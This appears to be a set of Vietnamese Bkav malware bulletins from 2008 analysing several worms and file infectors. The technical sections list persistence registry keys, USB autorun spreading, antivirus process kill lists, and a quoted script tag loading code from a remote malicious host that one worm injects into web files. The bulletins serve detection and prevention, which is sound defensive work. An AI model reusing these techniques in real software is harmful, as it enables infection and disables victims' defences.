Tắt các chương trình AntiVirus và các dịch vụ hệ thống của Windows Không vào được một vài trang web bảo mật và antivirus.. Cách phòng tránh: Không nên vào các trang web cung cấp các phầ
Trang 1Drop ra file có tên : "[random characters]0.dll" vào thư mục
%SysDir%
Ghi mã độc vào process : explorer.exe
Tạo các event :ZXCVASDFFCOOLDSS_MON, Game_start để
chỉ 1 worm cùng loại chạy trên 1 máy
Ăn cắp mật khẩu các game online: MappleStory
Tìm ổ USB và copy chính nó vào ổ đĩa ấy thành file "nt.com",
ghi thêm file "autorun.inf" để virus lây lan
Chuyên viên phân tích : Cao Minh Phương
Bkav2004 - Phát hành lần thứ 2 ngày 17/11/2008, cập nhật
G4eY5F, SkypeN, BrontokSD, FakeExpI, Itdead, MsFoxR
Malware cập nhật mới nhất:
Tên malware: W32.BrontokSD.Worm
Thuộc họ: W32.Brontok.Worm
Loại: Worm
Xuất xứ: Nước ngoài
Ngày phát hiện mẫu: 17/11/2008
Kích thước: 147 Kb
Mức độ phá hoại: Trung bình Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Tắt các chương trình AntiVirus và các dịch vụ hệ thống của Windows
Không vào được một vài trang web bảo mật và antivirus Mất menu FoderOptions
Cách thức lây nhiễm:
Phát tán qua trang Web Phát tán qua email : Với Subject là : "My Best Photo" Hoặc
"Fotoku yg Paling Cantik"
Kèm theo nội dung :
"Hi,
I want to share my photo with you
Wishing you all the best
Regards,"
Hoặc : "Hi, Aku lg iseng aja pengen kirim foto ke kamu
Jangan lupain aku ya ! Thanks,"
Trang 2Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack,
hack, các trang web đen, độc hại
Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các
file có đuôi exe com pif và bat
Mô tả kỹ thuật:
Tạo ra các bản sao của nó:
%Sysdir%\cmd-brontok.exe
%Windir%\Shellnew\[RandomName]
%Documents%\[UserName]\Local Settings\Application
Data\csrss.exe
%Documents%\[UserName]\Local Settings\Application
Data\lsass.exe
%Documents%\[UserName]\Local Settings\Application
Data\br7911on.exe
%Documents%\[UserName]\Local Settings\Application
Data\services.exe
%Documents%\[UserName]\Local Settings\Application
Data\winlogon.exe
%Documents%\[UserName]\Local Settings\Application
Data\inetinfo.exe
Ghi giá trị:
"Bron-Spizaetus" vào key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run để chạy virus lúc hệ thống khởi động
"Tok-Cirrhatus-3444" vào key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run để chạy virus lúc hệ thống khởi động
Sửa file hosts ngăn không cho người dùng truy cập vào một vài trang web bảo mật
Sửa key không cho người dùng sử dụng một vài tiện ích của windows và làm mất menu FolderOptions
Tắt các process và các cửa sổ có chứa 1 trong các xâu : peid , task view, telanjang, bugil, cewe, naked, porn, sex, alwil, wintask,
folder option,worm, trojan, avira, windows script, commander, pc-media, killer, ertanto,
anti, ahnlab, nod32, hijack, sysinter, aladdin, panda, trend, cillin, mcaf, avast, bitdef, machine, movzx, kill, washer, remove, wscript, diary,
untukmu, kangen, sstray, Alicia, Mariana, Dian, foto, zlh, Anti, mspatch,
siti, virus, services.com, ctfmon, nopdb, opscan, vptray, update, lexplorer, iexplorer,
nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv, systray, riyani, xpshare, syslove,
tskmgr, ccapps, ash, avg, poproxy, mcv
Trang 3Tìm các địa chỉ mail trong máy, đồng thời gửi mail có đính kèm
virus tới các địa chỉ vừa tìm được
Chuyên viên phân tích : Nguyễn Quốc Nhân
Bkav2009 (20/11/2008) cập nhật lần thứ 1: LogoOneKA,
MegabyA
Malware cập nhật mới nhất:
Tên malware: W32.LogoOneKA.PE
Thuộc họ: W32.LogoOne.PE
Loại: PE
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 19/11/2008
Kích thước: 61Kb
Mức độ phá hoại: Cao
Nguy cơ:
Ăn cắp thông tin cá nhân
Lây file
Làm giảm mức độ bảo mật của hệ thống
Hiện tượng:
Sửa registry
Dừng các chương trình diệt virus Làm chậm hệ thống
Mất icon của các file exe Cách thức lây nhiễm:
Phát tán qua trang web, phần mềm miễn phí
Phát tán qua các tài nguyên chia sẻ mạng nội bộ Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các file có đuôi exe com pif và bat
Không nên share full các ổ đĩa, thư mục trong mạng nội bộ, nên đặt password truy cập nếu muốn chia sẻ quyền sửa và tạo file
Mô tả kỹ thuật:
Ghi giá trị
"load" = %WinDir%\uninstall\rundl132.exe vào key
HKLM\Software\Microsoft\Windows\CurrentVersion\Run để chạy virus mỗi khi windows được khởi động
Trang 4Kiểm tra đã tồn tại key
[HKLM\SOFTWARE\Soft\DownloadWWW]
với giá trị "auto" = "1" làm dấu hiệu xác định xem virus lây
nhiễm chưa
Copy chính nó vào
%Windir%\ Logo1_.exe
%Windir%\uninstall\rundl132.exe
Drop ra file: %WinDir%\RichDll.dll
Ghi ngày lây nhiễm vào file C:\_desktop.ini
Lây file bằng cách ghi code virus vào trước file gốc
Lây vào toàn bộ các file exe trong ổ cứng từ C đến Y
Lây qua mạng nội bộ bằng cách copy và lây vào các file exe
trong các thư mục shared
Không lây những file đường dẫn có chứa:
• \Program Files\
• Common Files
• ComPlus Applications
• Documents and Settings
• InstallShield Installation Information
• Internet Explorer
• Messenger
• Microsoft Frontpage
• Microsoft Office
• Movie Maker
• MSN
• MSN Gaming Zone
• NetMeeting
• Outlook Express
• Recycled
• system
• System Volume Information
• system32
• windows
• Windows Media Player
• Windows NT
• WindowsUpdate
• winnt Kill các services và chương trình diệt virus:
• "Kingsoft AntiVirus Service"
• EGHOST.EXE
• IPARMOR.EXE
• KAVPFW.EXE
• MAILMON.EXE
• mcshield.exe
• RavMon.exe
• RavMonClass
• Ravmond.EXE
• regsvc.exe Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày:
W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit, W32.FialaKA.Worm, W32.MegabyA.Worm, W32.VtLightIA.PE, W32.KxvoET.Worm, W32.WinbetTT.Trojan,
Trang 5W32.AlureonB.Trojan, W32.ArfuBot.Trojan,
W32.CimusCD.Rootkit, W32.MSFoxCB.Worm
Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop, MixaFQ
Malware cập nhật mới nhất:
Tên malware: W32.MixaFQ.Worm
Thuộc họ: W32Mixa.Worm
Loại: Worm
Xuất xứ: Việt Nam
Ngày phát hiện mẫu: 20/11/2008
Kích thước: 3608Kb
Mức độ phá hoại: Trung bình
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Bị logoff máy tính khi sử dụng 1 vài tiện ích của windows như:
TaskMgr, RegistryTool,
Không hiển thị được file ẩn và file hệ thống
Cách thức lây nhiễm:
Phát tán qua trang web
Tự động lây nhiễm vào USB
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa
Mô tả kỹ thuật:
Ghi giá trị
"Userinit " = %SysDir%\systemio.exe vào key HKLM\ \CurrentVersion\Winlogon\
và Virus=%WinDir%\Mixa.exe Vào key HKLM\ \CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động
Copy bản thân thành các file :
%SysDir%\systemio.exe
%WinDir%\Mixa.exe Liên tục check các process, nếu thấy process có chứa 1 trong các xâu : taskmgr, procexp, regedit, mmc thì đóng tất cả các ứng dụng
và LogOff máy tính
Copy bản thân thành file có tên "Mixa_I.exe" kèm theo file autorun.inf vào tất cả các ổ đĩa
Trang 6Liên tục ghi key làm người dùng không hiện được các file ẩn và
file hệ thống
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ConthinA.Worm, W32.FialaKC.Worm,
W32.HtmInfectB.Trojan, W32.Suchop.PE,
W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm,
W32.OngameFS.Trojan, W32.RsnetJZ.Trojan,
W32.Lin32.Trojan, W32.Sobicyt.Adware,
W32.Soxpeca.Adware,
Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008, cập nhật
DashferKA, VtLightKA, CkvoHGV, ResycleB, Cmhot
Malware cập nhật mới nhất:
Tên malware: W32 DashferKA.PE
Thuộc họ: W32.Dashfer.PE
Loại: PE
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 21/11/2008
Kích thước: 165Kb
Mức độ phá hoại: Cao
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Không vào được chế độ safe mode của Windows
Xuất hiện popup các trang web tiếng Trung Quốc
Mất checkbox để hiển thị các file hệ thống
Cách thức lây nhiễm:
Phát tán qua trang web
Tự động lây nhiễm qua USB
Lây qua các file thực thi
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa
Mô tả kỹ thuật:
Xóa các key : HKLM\ \Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
Trang 7HKLM\ \Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
làm cho máy tính không khởi động được trong chế độ safemode
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Copy bản thân thành file có tên "lsass.exe" vào thư mục
%SysDir%\Com, và ~.exe vào thư mục Startup
để virus được thực thi khi khởi đông hệ thống
Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy
Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\Drivers\Alg.exe
Sửa key làm mất checkbox để hiển thị các file hệ thống
Copy bản thân thành file có tên : "pagefile.pif" kèm theo file
autorun.inf vào tất cả các ổ đĩa
Tắt các process có chứa một trong các xâu sau : rav, avp,
twister, kv, watch, kissvc, scan, guard
Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm
thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén rar)
đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ
thống
Chuyên viên phân tích : Nguyễn Ngọc Dũng